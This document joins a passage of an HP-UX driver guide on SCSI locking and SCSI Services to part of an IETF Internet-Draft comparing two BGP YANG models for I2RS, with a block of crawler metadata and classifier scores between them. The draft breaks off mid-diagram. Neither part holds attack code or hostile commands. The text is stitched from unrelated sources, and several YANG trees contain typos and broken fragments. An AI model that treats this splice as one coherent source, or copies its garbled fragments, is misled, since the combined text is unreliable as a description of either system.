Each `scsi_tgt` structure has a lock associated with it that protects some of the fields in the structure. Device drivers can access the `open_cnt`, `sctl_open_cnt`, `state`, and `bus` fields in this structure. Device drivers may only modify the `state` field, and must do so under the protection of the target lock. The target lock can also be used to prevent the `open_cnt`, `sctl_open_cnt`, or `state` field from being modified while other conditions are checked or actions are performed.
**LUN Lock**
Each `scsi_lun` structure has a lock associated with it that protects the fields in the structure and in the `dd_lun` private data area. See the following section on the LUN structure to see which fields device drivers can access and modify, and which locks protect those fields.
For the `driver_open()` routine, the device driver does not have any of the locks available until after the kernel calls `scsi_lun_open()`, because `scsi_lun_open()` creates the `scsi_bus`, `scsi_tgt`, and `scsi_lun` structures.
For the `driver_close()` routine, the situation is similar. The locks are also available when the `dd_close()` routine is called. When `scsi_lun_close()` returns control to its caller, the locks are no longer available to your driver.
SCSI Services Summary
SCSI Services are commonly used SCSI functions that allow device and interface drivers to be much smaller and more supportable. In addition to providing most commonly used SCSI functions, WSIO SCSI Services also provide a supported pass-through mechanism. (See scsi_ctl(7) in the HP-UX Reference for information on pass-through.)
SCSI Services are summarized in Table 9-1, “SCSI Services.” For more detailed information on these services see the HP-UX Driver Development Reference.
<table>
<thead>
<tr>
<th>Service</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>m_scsi_lun()</td>
<td>Returns scsi_lun pointer corresponding to the dev_t parameter passed in.</td>
</tr>
<tr>
<td>disksort_enqueue()</td>
<td>Places I/O requests on queues maintained by SCSI Services.</td>
</tr>
<tr>
<td>scsi_dequeue()</td>
<td>Removes I/O requests from queues maintained by SCSI Services.</td>
</tr>
<tr>
<td>scsi_dequeue_bp()</td>
<td>Externally available to dequeue particular bp from circular list. Intended for use with LVM's B_PFTIMEOUT.</td>
</tr>
<tr>
<td>scsi_ddsw_init()</td>
<td>Called from device driver's driver_dev_init() routine. Causes initialization of blk_major and raw_major fields in the driver's switch table (ddsw).</td>
</tr>
<tr>
<td>scsi_lun_open()</td>
<td>Called from device driver's driver_dev_init() routine. Performs necessary open operations, including the invocation of the calling driver's ddsw->dd_open() routine.</td>
</tr>
</tbody>
</table>
### Table 9-1: SCSI Services
<table>
<thead>
<tr>
<th>Service</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>scsi_init_inquiry_data()</td>
<td>Called from device driver's <code>ddsw->dd_open()</code> routine. Performs first SCSI Inquiry request to the device.</td>
</tr>
<tr>
<td>scsi_strategy()</td>
<td>The first place in the I/O path that all I/O requests have in common. Its primary purpose is to enqueue the bp to await the necessary resources to allow the request to be sent to the interface driver, and thus, the hardware.</td>
</tr>
<tr>
<td>scsi_read()</td>
<td>Synchronous read routine, which calls <code>physio()</code>.</td>
</tr>
<tr>
<td>scsi_write()</td>
<td>Synchronous write routine, which calls <code>physio()</code>.</td>
</tr>
<tr>
<td>scsi_ioctl()</td>
<td>Ioctl commands that are supported by all drivers are implemented here to ensure consistency among drivers.</td>
</tr>
<tr>
<td>scsi_cmd(), scsi_cmdx()</td>
<td>For driver-generated I/O requests. It creates and builds a <code>sctl_io</code> and a <code>bp</code>, attaches the <code>sctl_io</code> to the <code>bp</code>, forwards the <code>bp</code> to the <code>scsi_strategy()</code> routine, and cleans up when the I/O is completed.</td>
</tr>
<tr>
<td>scsi_action()</td>
<td>Must ultimately be called after each I/O attempt completion (as in a retry situation). It may log errors to the <code>dmesg</code> buffer, retry the I/O, or disable tags.</td>
</tr>
</tbody>
</table>
### SCSI Services
<table>
<thead>
<tr>
<th>Service</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>scsi_sense_action()</td>
<td>Interprets sense data for SCSI, CCS, or SCSI-2 compliance. It requires that the inquiry data for the device has been initialized by scsi_init_inquiry_data() before it can interpret it.</td>
</tr>
<tr>
<td>scsi_snooze()</td>
<td>Performs a sleep without tying up the processor. Must not be called by a thread of execution that holds any lock. Currently, this routine is used only by scsi_disk to delay subsequent device access following Inquiry to a particular model of Quantum disk drive.</td>
</tr>
<tr>
<td>scsi_log_io()</td>
<td>Records the I/O attempt and its results in the dmesg buffer.</td>
</tr>
</tbody>
</table>
|
{"Source-Url": "http://h21007.www2.hp.com/portal/download/files/unprot/Drivers/Docs/Refs/ddGuide/Chap09.pdf", "len_cl100k_base": 11989, "olmocr-version": "0.1.50", "pdf-total-pages": 44, "total-fallback-pages": 0, "total-input-tokens": 78581, "total-output-tokens": 14342, "length": "2e13", "weborganizer": {"__label__adult": 0.0008769035339355469, "__label__art_design": 0.0006890296936035156, "__label__crime_law": 0.0003664493560791016, "__label__education_jobs": 0.00139617919921875, "__label__entertainment": 0.000171661376953125, "__label__fashion_beauty": 0.0004088878631591797, "__label__finance_business": 0.0005102157592773438, "__label__food_dining": 0.0004780292510986328, "__label__games": 0.003162384033203125, "__label__hardware": 0.080810546875, "__label__health": 0.0006361007690429688, "__label__history": 0.0004935264587402344, "__label__home_hobbies": 0.0004165172576904297, "__label__industrial": 0.001941680908203125, "__label__literature": 0.00046753883361816406, "__label__politics": 0.00033974647521972656, "__label__religion": 0.0011148452758789062, "__label__science_tech": 0.0792236328125, "__label__social_life": 8.07642936706543e-05, "__label__software": 0.0242156982421875, "__label__software_dev": 0.80029296875, "__label__sports_fitness": 0.0006766319274902344, "__label__transportation": 0.0011043548583984375, "__label__travel": 0.0002892017364501953}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 46107, 0.00708]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 46107, 0.67143]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 46107, 0.7669]], "google_gemma-3-12b-it_contains_pii": [[0, 30, false], [30, 1686, null], [1686, 2840, null], [2840, 3068, null], [3068, 4564, null], [4564, 5588, null], [5588, 5715, null], [5715, 6220, null], [6220, 7926, null], [7926, 9394, null], [9394, 11364, null], [11364, 11979, null], [11979, 13123, null], [13123, 14062, null], [14062, 14914, null], [14914, 15096, null], [15096, 16546, null], [16546, 17289, null], [17289, 17772, null], [17772, 18802, null], [18802, 19905, null], [19905, 21278, null], [21278, 22358, null], [22358, 23658, null], [23658, 25120, null], [25120, 26107, null], [26107, 26905, null], [26905, 28333, null], [28333, 29291, null], [29291, 30237, null], [30237, 31739, null], [31739, 32831, null], [32831, 33505, null], [33505, 34859, null], [34859, 35964, null], [35964, 36919, null], [36919, 37911, null], [37911, 38570, null], [38570, 40086, null], [40086, 41808, null], [41808, 43339, null], [43339, 45083, null], [45083, 46107, null], [46107, 46107, null]], "google_gemma-3-12b-it_is_public_document": [[0, 30, true], [30, 1686, null], [1686, 2840, null], [2840, 3068, null], [3068, 4564, null], [4564, 5588, null], [5588, 5715, null], [5715, 6220, null], [6220, 7926, null], [7926, 9394, null], [9394, 11364, null], [11364, 11979, null], [11979, 13123, null], [13123, 14062, null], [14062, 14914, null], [14914, 15096, null], [15096, 16546, null], [16546, 17289, null], [17289, 17772, null], [17772, 18802, null], [18802, 19905, null], [19905, 21278, null], [21278, 22358, null], [22358, 23658, null], [23658, 25120, null], [25120, 26107, null], [26107, 26905, null], [26905, 28333, null], [28333, 29291, null], [29291, 30237, null], [30237, 31739, null], [31739, 32831, null], [32831, 33505, null], [33505, 34859, null], [34859, 35964, null], [35964, 36919, null], [36919, 37911, null], [37911, 38570, null], [38570, 40086, null], [40086, 41808, null], [41808, 43339, null], [43339, 45083, null], [45083, 46107, null], [46107, 46107, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 46107, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 46107, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 46107, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 46107, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 46107, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 46107, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 46107, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 46107, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 46107, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 46107, null]], "pdf_page_numbers": [[0, 30, 1], [30, 1686, 2], [1686, 2840, 3], [2840, 3068, 4], [3068, 4564, 5], [4564, 5588, 6], [5588, 5715, 7], [5715, 6220, 8], [6220, 7926, 9], [7926, 9394, 10], [9394, 11364, 11], [11364, 11979, 12], [11979, 13123, 13], [13123, 14062, 14], [14062, 14914, 15], [14914, 15096, 16], [15096, 16546, 17], [16546, 17289, 18], [17289, 17772, 19], [17772, 18802, 20], [18802, 19905, 21], [19905, 21278, 22], [21278, 22358, 23], [22358, 23658, 24], [23658, 25120, 25], [25120, 26107, 26], [26107, 26905, 27], [26905, 28333, 28], [28333, 29291, 29], [29291, 30237, 30], [30237, 31739, 31], [31739, 32831, 32], [32831, 33505, 33], [33505, 34859, 34], [34859, 35964, 35], [35964, 36919, 36], [36919, 37911, 37], [37911, 38570, 38], [38570, 40086, 39], [40086, 41808, 40], [41808, 43339, 41], [43339, 45083, 42], [45083, 46107, 43], [46107, 46107, 44]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 46107, 0.02355]]}
|
olmocr_science_pdfs
|
2024-11-28
|
2024-11-28
|
a5d5a80ef6e935e2890c614fec963ea050cd1e0a
|
Comparison of I2RS and Config BGP Yang Modules
draft-hares-i2rs-bgp-compare-yang-01
Abstract
This document contains a comparison of two BGP yang models: draft-zhdankin-netmod-bgp-cfg-01 and draft-wang-i2rs-bgp-dm. The yang model in draft-zhdankin-netmod-bgp-cfg-01 is a model focused on configuration. The yang model in draft-wang-i2rs-bgp-dm-00 is focused on the status and ephemeral state changes needed for the I2RS interface. The conclusion of comparison is that there little overlap except the definitions of common bgp structures. The draft-wang-i2rs-bgp-dm-00 is necessary to fulfil a majority of the requirement drawn from the BGP use cases in the I2RS use cases (draft-i2rs-hares-usecase-reqs-summary).
Status of This Memo
This Internet-Draft is submitted in full conformance with the provisions of BCP 78 and BCP 79.
Internet-Drafts are working documents of the Internet Engineering Task Force (IETF). Note that other groups may also distribute working documents as Internet-Drafts. The list of current Internet-Drafts is at http://datatracker.ietf.org/drafts/current/.
Internet-Drafts are draft documents valid for a maximum of six months and may be updated, replaced, or obsoleted by other documents at any time. It is inappropriate to use Internet-Drafts as reference material or to cite them other than as "work in progress."
This Internet-Draft will expire on April 30, 2015.
Copyright Notice
Copyright (c) 2014 IETF Trust and the persons identified as the document authors. All rights reserved.
This document is subject to BCP 78 and the IETF Trust’s Legal Provisions Relating to IETF Documents (http://trustee.ietf.org/license-info) in effect on the date of publication of this document. Please review these documents.
carefully, as they describe your rights and restrictions with respect to this document. Code Components extracted from this document must include Simplified BSD License text as described in Section 4.e of the Trust Legal Provisions and are provided without warranty as described in the Simplified BSD License.
Table of Contents
1. Introduction ................................................. 2
2. Definitions and Acronyms ................................. 3
3. BGP Yang Draft Comparison ................................. 4
4. Differences between the drafts ......................... 4
4.1. Overlap of configuration draft-zhdankin-netmod-bgp-01 . . 7
4.2. Unique configuration for draft-zhdankin-netmod-bgp-01 . . 7
4.3. Unique configuration for draft-wang-bgp-dm-00 ........... 8
5. Comparison of State needed versus BGP requirements ...... 9
5.1. BGP-REQ 01 ........................................... 9
5.2. BGP-REQ 02 ........................................... 10
5.3. BGP-REQ 03 ........................................... 13
5.4. BGP-REQ 04 ........................................... 14
5.5. BGP-REQ 05 ........................................... 15
5.6. BGP-REQ 06 ........................................... 16
5.7. BGP-REQ 07 ........................................... 17
5.8. BGP-REQ 08 ........................................... 18
5.9. BGP-REQ 09 ........................................... 19
5.10. BGP-REQ 10 ........................................... 20
5.11. BGP-REQ 11 ........................................... 22
5.12. BGP-REQ 12 ........................................... 22
5.13. BGP-REQ 13 ........................................... 25
5.14. BGP-REQ 14 ........................................... 25
5.15. BGP-REQ 15 ........................................... 27
5.16. BGP-REQ 16 ........................................... 27
5.17. BGP-REQ 17 ........................................... 28
5.18. BGP-REQ 18 ........................................... 28
6. IANA Considerations ........................................... 29
7. Security Considerations ...................................... 29
8. Informative References ...................................... 29
Author’s Address .................................................. 30
1. Introduction
The Interface to the Routing System (I2RS) provides read and write access to the information and state within the routing process within routing elements. The I2RS client interacts with one or more I2RS agents to collect information from network routing systems. The processing of collecting information at the I2RS agent may require the I2RS Agent to filter certain information, group pieces of
information, or perform actions on the I2rs collected information based on specific I2rs policies.
This draft is a comparison of the following two BGP yang models: [I-D.zhdankin-netmod-bgp-cfg], and [I-D.wang-i2rs-bgp-dm]. The comparison provides an overview of the differences, overlaps, and unique features of each yang model. The analysis also evaluates whether both models or a single model is necessary to satisfy the requirements for the BGP use cases found in the [I-D.hares-i2rs-usecase-reqs-summary].
This draft concludes each of these two drafts focuses on the purpose each draft was created for (configuration, I2rs status and ephemeral state). The drafts have little overlap outside common definitions for some of the BGP functions. Both drafts reference bgp policy outside the basic structures (Prefix-lists, and policy-groups). Both drafts have concepts of AFI level and BGP neighbor level features. The status and ephemeral state found in [I-D.wang-i2rs-bgp-dm] is necessary to fulfill the BGP use cases found in the [I-D.hares-i2rs-usecase-reqs-summary]. Configuration knobs in [I-D.zhdankin-netmod-bgp-cfg] were helpful to support these bgp use cases, but the lack of state would not allow support of these features. The recommendation is that the two drafts harmonize the group structures and continue as two separate drafts for their original purpose (config and I2RS).
One BGP requirement (BGP-REQ18) requires a re-computation of the local BGP tables after policies have been modified by the ephemeral interface. The exact methodology of this re-computation could be part of ephemeral soft re-configuration. However, the I2RS WG has not determine how ephemeral state acts. Neither draft has created mechanism to do the ephemeral state re-configuration which is wise since both the I2RS WG and netmod WG should develop a joint ephemeral re-configuration process.
The rest of this draft is the details so those who desire "sounds bytes" level reading may stop reading now.
2. Definitions and Acronyms
BGP - Border Gateway Protocol version 4
CLI: Command Line Interface
IGP: Interior Gateway Protocol
I2RS: Interface to (2) Routing system.
Information Model: An abstract model of a conceptual domain, independent of a specific implementations or data representation.
INSTANCE: Routing Code often has the ability to spin up multiple copies of itself into virtual machines. Each Routing code instance or each protocol instance is denoted as Foo_INSTANCE in the text below.
NETCONF: The Network Configuration Protocol
3. BGP Yang Draft Comparison
The authors of [I-D.zhdankin-netmod-bgp-cfg] focused on the configuration aspect of BGP (98%+ configuration, 2% status). The [I-D.wang-i2rs-bgp-dm] is focused on the I2RS need for status with a small amount of specific I2RS configuration for I2RS needs (95% status, 2% config). The two drafts can be combined together, but guidance is needed from the netmod group as the I2RS state is read-write ephemeral.
Why is draft-wang-bgp-dm-00 mostly focused on routes, statistics, and state?
The use cases specified in [I-D.hares-i2rs-usecase-reqs-summary] demonstrate a need for the status found in [I-D.wang-i2rs-bgp-dm] which includes: bgp-local-rib, bgp-rib-in, bgp-rib-out and all kinds of statistics and state, such as protocol-status, bgp-rt-state-info, peer-state-info, max-prefix-rcv-limit, etc. The status is both a the AFI state and the BGP peer state (within the AFI).
Two versions of [I-D.zhdankin-netmod-bgp-cfg] have been released - a -00.txt and a -01.txt.txt he second version (-01 version) only updated references to netmod and states on the yang modules. This draft will use the -01 version of [I-D.zhdankin-netmod-bgp-cfg],
The [I-D.wang-i2rs-bgp-dm] was released mistakenly as [I-D.hares-i2rs-bgp-dm]. A few corrections to the status fields were included in the [I-D.wang-i2rs-bgp-dm]. This draft uses [I-D.wang-i2rs-bgp-dm] for the comparison.
4. Differences between the drafts
The [I-D.zhdankin-netmod-bgp-cfg] is composed by two parts: BGP Router Configuration and Prefix Lists. BGP Router Configuration contains including 3 parts: af-configuration, bgp-neighbors, and rplk-config (as shown in figure 1).
module: bgp
+--rw bgp-router
| +--rw rpki-config
| +--rw af-configuration
| +--rw bgp-neighbors (98% config, 2% state)
+--rw Prefix Lists
+--rw prefix-lists
+--rw prefix-list [prefix-list-name]
+--rw prefix-list-name string
+--rw prefixes
+--rw prefix [seq-nr]
+--rw seq-nr uint16
+--rw prefix-filter
| +--rw (ip-address-group)?
| | +--rw action actions-enum
| | +--rw statistics
| .....
.....
Figure 1: draft-zhdankin-netmod-bgp-cfg structure
The [I-D.wang-i2rs-bgp-dm] is written with a status structure focus where manipulation of every concrete route through controlling policy and BGP attributes in different BGP address families. This does not contain the rpki-config. These drafts have ~5% overlap in status/configuration.
module: bgp
+--rw bgp-protocols
| +--rw af-status
| +--rw bgp-local-rib
| +--rw bgp-neighbors (2% config, 98% state)
| | +--rw policy-in
| | +--rw policy-out
| | +--rw peer-state
| | +--rw bgp-rib-in
| | +--rw bgp-rib-out
module: ietf-pcim
+--rw Policy-sets
+--rw Policy-groups
+--rw Policy-Rules
Figure 2 draft-i2rs-wang-bgp-dm-00
The focus is status-based based on AFI, but includes local-rib and BGP neighbor’s policy (in and out), peer state, rib-in, and rib-out.
Prefix list policy being covered inline ([I-D.zhdankin-netmod-bgp-cfg]) versus in the draft-hares-bnp-im-01 which uses the policy descriptions created by RFC3060, RFC3460, and other policy work. This methodology is being utilized by the OpenDaylight Group policy as well.
Redistribution being done inline ([I-D.zhdankin-netmod-bgp-cfg]) as a configuration. The draft-i2rs-wang-bgp-dm-00 did not configure af-configuration.
[I-D.zhdankin-netmod-bgp-cfg] claims to list the aspath path was well as the prefix configuration, but this section is missing in the draft. The example is the expression of as-path in draft-i2rs-wang-bgp-dm-00 is a actually string value of as-path which is one of attributes in BGP route rather not a Boolean value as used in [I-D.zhdankin-netmod-bgp-cfg].
The order of specifying the protocol elements is different in some cases due to the status versus configuration focus. For example, limiting maximum prefixes and maximum paths is done in a slightly different way. A second example is that community and cluster strings.
Below is an example of the AF-status structure found in draft-bgp-dm-00
module: bgp-protocol
+--rw bgp-protocol
| +--rw bgp-ipv4-uni-instance
| | | +--rw bgp-local-rib
| | +--rw bgp-peer-list
| | | +--rw bgp-rib-in
| | | | +--rw bgp-rib-out
| | | ...
| +--rw bgp-evpn-instance
| | +--rw bgp-local-rib
| | | +--rw bgp-peer-list
| | | | +--rw bgp-rib-in
| | | | | +--rw bgp-rib-out
figure bgp-3
4.1. Overlap of configuration draft-zhdankin-netmod-bgp-01
The draft-zhdankin-netmod-bgp-01 and draft-wang-i2rs-bgp-dm-00 both contain at the protocol level:
module: bgp
+--rw bgp router [bgp protocol]
+--rw local-as-number? unit32
+--rw local-as-identifier inet:ip-address (zhankin)
+--rw router-id inet:ip-address (wang)
The module contains at the peer level the association of a peer with an AS
[draft-zhdankin-netmod-bgp-01]
+--rw bgp-neighbors* [AS-number]
+--rw as-number
+--rw (peer-address-type)?
...
+--rw prefix-list prefix-list-ref
+--default-action? enumeration (permit/deny)
[[I-D.wang-i2rs-bgp-dm]]
+--rw bgp-peer-list* [bgp-peer-name]
+--rw peer-session-address?
...
+--rw peer-name
+--ro peer-type
+--rw bgp-policy-in policy-set-name
+--rw bgp-policy-out policy-set-name
figure bgp-3
4.2. Unique configuration for draft-zhdankin-netmod-bgp-01
[I-D.zhdankin-netmod-bgp-cfg] contains the unique configuration for RPKI, AF-configuration and BGP peers. A sample of the unique configuration for the AF-configuration is:
- cost-communities
- BGP-damping
- route-aggregation - this is policy so we could easily add,
o reflector clients
o best external advertisement
o aggregate timer (sending out aggregate times)
o flags to compare router-id as part of bgp bestpath selection
o MED-confederation
o administrative distance (cisco)
o packet forwarding over multiple paths
o allowances for slow peers
o BGP multi-path (ECMP peers)
o external fail-over for peer
o AS confederations
o deterministic MEDs
o Graceful-restart
o BGP AS listener only
o Logging of neighbor changes
o Transport options for BGP
o Removal of private AS
4.3. Unique configuration for draft-wang-bgp-dm-00
The following variables were included in [I-D.hares-i2rs-bgp-dm], but not in [I-D.zhdankin-netmod-bgp-cfg]:
o protocol-status (ro) - needed for I2RS information
o shutdown protocol - needed if I2RS is to shutdown bgp protocol,
o AFI based local-rib
o BGP-peer-status information - [I-D.zhdankin-netmod-bgp-cfg] has number of updates, but less status information in the draft.
The following pieces are needed by I2RS:
- At instance level, `bgp-instance-name`, `bgp-instance-create` (to create bgp process), `bgp-instance-type` (to specify what type to create),
- At AFI level in local rib, `bgp_route_create` (to add bgp route for i2rs) and `bgp_state_info` for status updates.
- At peer level, there must be maximum prefixes per peer (received and transmit), high water/low water prefix counts, and average number of prefixes;
- Versions for instance publishing,
- Details on path attributes: ASPath strings, community and extend-community attribute, cluster lists, aggregation, atomic aggregator;
- Mechanisms for logging/publishing information
5. Comparison of State needed versus BGP requirements
5.1. BGP-REQ 01
BGP-REQ01 requirement is: I2RS client/agent exchange SHOULD support the read, write and quick notification of status of the BGP peer operational state on each router within a given Autonomous System (AS). This operational status includes the quick notification of protocol events that proceed a destructive tear-down of BGP session
[I-D.zhdankin-netmod-bgp-cfg] contains the following status related to each peer’s bgp operational state.
module: bgp
+-- bgp-router
+ . . .
+-- rw bgp-neighbors
+--rw peer-address
| . . .
+--rw bgp-neighbor-state
| +--rw bgp-peer-admin-status enumeration
| +--rw in-lastupdatetime
Figure bgp-6
Conclusion: [I-D.zhdankin-netmod-bgp-cfg] does not provide support required by I2RS.
[I-D.wang-i2rs-bgp-dm] contains the following status related to each peer’s BGP operational state:
module: bgp
+--bgp-protocol
+ . .
+rw bgp-ipv4-uni-instance (af-instance)
+--rw bgp-instance-name
| . .
+--rw bgp-local-rib
| . .
+--rw bgp-peer-list [bgp-peer-name]
. .
+--rw peer-state-info
| +--rw peer-current-state? peer-state
| +--rw peer-last-state? peer-state
| +--ro peer-down-reason
| +--ro error code? enumeration
| +--ro (sub-error-code-type)?
| +-- ro: (head-error-sub-code)
| +-- ro head-error-sub-value? enumeration
| +-- ro: (open-error-sub-code)
| +-- ro open-error-sub-value? enumeration
| +-- ro: (update-error-sub-code)
| +-- ro-update-error-sub-value? enumeration
| +-- ro: (route-refresh-error-sub-code)
| +-- ro-route-refresh-error-sub-value? enumeration
figure bgp-7
Conclusion: [I-D.wang-i2rs-bgp-dm] provides for this requirement.
5.2. BGP-REQ 02
BGP-REQ02 requirement is: "I2RS client SHOULD be able to push BGP routes with custom cost communities to specific I2RS agents on BGP routers for insertion in specific BGP Peer(s) to aid Traffic engineering of data paths. These routes SHOULD be tracked by the I2RS Agent as specific BGP routes with customer cost communities. These routes (will/will not) be installed via the RIB-Info."
Status:
[I-D.zhdankin-netmod-bgp-cfg] supports configuration related to address family control of these features, but it does not have a route level support. The AFI family configuration is shown in context below:
Conclusion: This [I-D.zhdankin-netmod-bgp-cfg] does not adequately support the I2RS BGP REQ02.
[I-D.wang-i2rs-bgp-dm] does support per-route configuration tagging of route with customer community in local BGP rib, and per peer AdjRibIn and adjRibout.
++-bgp-protocol
+ . .
+rw bgp-ipv4-uni-instance (af-instance)
++-rw bgp-instance-name
| . .
++-rw afi
++-rw safi
++-rw bgp-local-rib
++-rw bgp-route-list* [ipv4-route ipv4-prefix-length]
++-rw ipvr-route inet:ipv4-prefix
++-rw ipv4-prefix-length uint8
++-rw route-type? enumeration
++-rw bgp-attribute-list*
++-rw bgp-origin?
. .
++-rw bgp-extcommattr
++-rw custom-community
++-rw valid boolean
++-rw insertion point uint8
++-rw community-id uint8
++-rw cost-id uint32
++-rw useextcommsize uint16
++-rw ulrefcount? uint16
++-rw excmmattr-value string
++-rw bgp-peer-list* (bgp-peer-name)
. .
++-rw bgp-rib-in
++-rw bgp-rib-in-list* (ipv4 route
ipv4-prefix-length route-distinguisher)
++-rw ipv4-route inet_ipv4-prefix
++-rw bgp-attribute-list*
. .
++-rw bgp-extcommattr
++-rw custom-community
++-rw valid boolean
++-rw insertion point uint8
++-rw community-id uint8
++-rw cost-id uint32
++-rw useextcommsize uint16
++-rw ulrefcount? uint16
++-rw excmmattr-value string
. .
++-rw bgp-rib-out
++-rw bgp-rib-out-list* (ipv4 route
ipv4-prefix-length route-distinguisher)
++-rw ipv4-route inet_ipv4-prefix
++-rw bgp-attribute-list*
. .
Conclusion: [I-D.wang-i2rs-bgp-dm] needed as well as [I-D.zhdankin-netmod-bgp-cfg].
5.3. BGP-REQ 03
BGP-REQ03 requirement is: "I2RS client SHOULD be able to track via read or notifications all Traffic engineering changes applied via I2RS agents to BGP route processes in all routers in a network."
Discussion on Requirement: Traffic engineering changes can include: ORFs (RFC5291, 5292), flows specifications (RFC5575, draft-ietf-), TE performance (draft-ietf-idr-te-pm-bgp-01), traffic-engineering state (draft-ietf-idr-te-lsp-distribution), and route target filtering. Additional input needs to be obtained from the i2rs WG on what constitutes traffic engineering.
Status:
[I-D.zhdankin-netmod-bgp-cfg] has the following potential configuration support:
- on most af configurations: af-bgp_config container supports allowing the following features: add-path, best-external, aggregation timer, damping, propagating dmz-link-bw, and redistributing iBGP routes into IGP.
- af rtfilters - AFI for rtfilters.
These features do not provide any of the traffic engineering input.
[I-D.wang-i2rs-bgp-dm]: has per route status tracking for the local-rib associated with each afi, and the virtual bgp AdjRibIn and BGP AdjRibOut for each peer. Each route has a route type that include route types for all valid NLRIIs which includes: ipv4, ipv6, labeled ipv4, labeled ipv6, flows, link-state (ls) data, evpn, mvpn, vpls, l2vpn-singaling-nlri, rt-constraint, pw-route.
Figure bgp-10
What needs to be added: Once the I2RS WG specifies what traffic engineering flags to watch on the BGP routes at AFI local-rib level or the BGP-peer routes (AdjRibIn, AdjRibOut), then the [I-D.wang-i2rs-bgp-dm] can be augmented.
If the I2RS WG specifies configurations for traffic engineering at the AFI or BGP-peer level, these ephemeral status will either need to be added to draft-wang-i2rs-bgp-dm-00 status or the peer.
5.4. BGP-REQ 04
BGP-REQ04 requirement is: "I2RS Agents SHOULD support identification of routers as BGP ASBRs, PE routers, and IBGP routers."
[I-D.zhdankin-netmod-bgp-cfg]: No status provides a summation of the BGP roles a BGP routing instance. The BGP-neighbor structure does not provide a role structure.
[I-D.wang-i2rs-bgp-dm]:
The enumeration for bgp-role is asbr, pe, ibgp, rr where the role is a bit mask indicating that one or more peer has this role on the protocol instance.
The enumeration for bgp-peer-type is asbr, ibgp, rr, rr-client, pe, ce, bgp-vendor-types;
Conclusion: [I-D.wang-i2rs-bgp-dm] supports BGP-REQ 04
5.5. BGP-REQ 05
BGP-REQ05 is: I2RS client-agent SHOULD support writing traffic flow specifications to I2RS Agents that will install them in associated BGP ASBRs and the PE routers.
Status: BGP-REQ05 is the ability to read the roles within a bgp protocol instances at protocol level and at peer level, and to write routes with traffic flow specifications to AFI database and (optionally) bgp-peer AdjRibOut.
BGP-REQ 4 showed that the [I-D.wang-i2rs-bgp-dm] supports the identification of BGP ASBR and PE routers at a peer level. It also has a quick summary of the roles of BGP routers at the protocol level. [I-D.wang-i2rs-bgp-dm] specifies a a route-type variable within each route in the AFI local-rib or the BGP Peers routes (AdjRibIn, AdjRibOut), and this route-type includes a enumeration variable for flows.
[I-D.wang-i2rs-bgp-dm]
Conclusion: [I-D.wang-i2rs-bgp-dm] supports BGP-REQ-05.
5.6. BGP-REQ 06
BGP-REQ06 requirement is: "I2RS Client SHOULD be able to track flow specifications installed within a IBGP Cloud within an AS via reads of BGP Flow Specification information in I2RS Agent, or via notifications from I2RS agent."
Status: As section 3.5.5 on BGP-REQ04 shows [I-D.wang-i2rs-bgp-dm] supports the tracking of flow-specification routes associated with the local-rib for a AFI or a BGP Peer.
[I-D.wang-i2rs-bgp-dm]:
module: bgp protocol
+--bgp-protocol
+ . . .
+rw bgp-ipv4-uni-instance (af-instance)
+--rw bgp-instance-name
| . . .
+--rw afi
+--rw safi
+--rw bgp-local-rib
+--rw bgp-route-list* [ipv4-route ipv4-prefix-length]
| +--rw ipv4-route inet:ipv4-prefix
| +--rw ipv4-prefix-length uint8
| +--rw route-type? enumeration
Figure bgp-12
module: bgp protocol
+--bgp-protocol
+ . . .
+rw bgp-ipv4-uni-instance (af-instance)
+--rw bgp-instance-name
. . .
+--rw bgp-local-rib
+--rw bgp-rib-in-list* (ipv4 route ipv4-prefix-length
+--rw ipv4-route inet:ipv4-prefix
+--rw ipv4-prefix-length uint8
+--rw route-type? enumeration
. . .
+--rw bgp-peer-list* (bgp-peer-name)
+--rw bgp-peer-session address
+--rw bgp-peer-name
+--rw bgp-peer-type
+--rw bgp-rib-in
+--rw bgp-rib-in-list* (ipv4 route ipv4-prefix-length
+--rw ipv4-route inet:ipv4-prefix
+--rw ipv4-prefix-length uint8
+--rw route-type? enumeration
Figure bgp-13
5.7. BGP-REQ 07
BGP-REQ07 requirement is: I2RS client-agent exchange SHOULD support
the I2RS client being able to prioritize and control BGP’s
announcement of flow specifications after status information reading
BGP ASBR and PE router’s capacity. BGP ASBRs and PE routers
functions within a router MAY forward traffic flow specifications
received from EBGP speakers to I2RS agents, so the I2RS Agent SHOULD
be able to send these flow specifications from EBGP sources to a
client in response to a read or notification.
Discussion: The I2RS WG needs to provide additional input on what
status information is key to track for the BGP ASBR and PE router’s
capacity.
Status:
[I-D.zhdankin-netmod-bgp-cfg] has prefix-lists which can allow or
deny prefixes based on the NLRI family. This feature allows the
control of routes via the flow specification NLRI. However peer
status does not provide an easy way to detect BGP ASBR or PE status,
or the number of routes.
[I-D.wang-i2rs-bgp-dm] has the ability to specify flexible policy via policy-sets for inbound and outbound policy that can filter based on prefix or any match sequence within the route and peer. This draft also provides a data model that tracks which peers are ASBR and PE at the peer level via bgp-peer-type and at the protocol level via bgp-role (as described above). This draft also specifies administrative distance on route structures in the per AFI bgp-local-rib or in the peers routes per AFI.
module: bgp protocol
+--bgp-protocol
+ . . .
+rw bgp-ipv4-uni-instance (af-instance)
+--rw bgp-instance-name
